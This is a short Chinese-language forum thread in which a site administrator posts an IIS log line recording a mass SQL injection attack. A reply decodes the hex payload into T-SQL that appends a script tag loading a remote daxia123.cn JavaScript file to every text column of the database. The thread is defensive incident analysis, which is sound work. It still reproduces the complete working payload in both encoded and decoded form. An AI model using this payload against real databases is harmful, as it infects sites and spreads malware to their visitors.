1   1  /  1  页   跳转

找到了daxia123.cn攻击方式

找到了daxia123.cn攻击方式

通过查看iis文件发现:
2008-12-28 00:21:59 GET /class_2_ketang.asp productclass_1=%cd%e2%d3%ef&productclass_2=%cd%d0%b8%a3/%cd%d0%d2%b5%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=' 80 - 211.200.16.248 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 404 0 2
攻击ip我查了一下是来自首尔,肯定用的代理
这个文件已经被我们删除,所以他攻击不了,所有现在可以肯定的是这次攻击是通过sql注入,并且进行了二进制加密,所要一定要查看iis日志,找到网站漏洞,才能根本解决问题

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
分享到:
gototop
 

回复:找到了daxia123.cn攻击方式

好象很深奥!  看不懂!  能教教吗?
gototop
 

回复:找到了daxia123.cn攻击方式

苦恼    那么深噢哦```  看不懂```
gototop
 

解密得:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor;eXeC(@s);-- aNd '%'=' 80 - 211.200.16.248 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 404 0 2
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT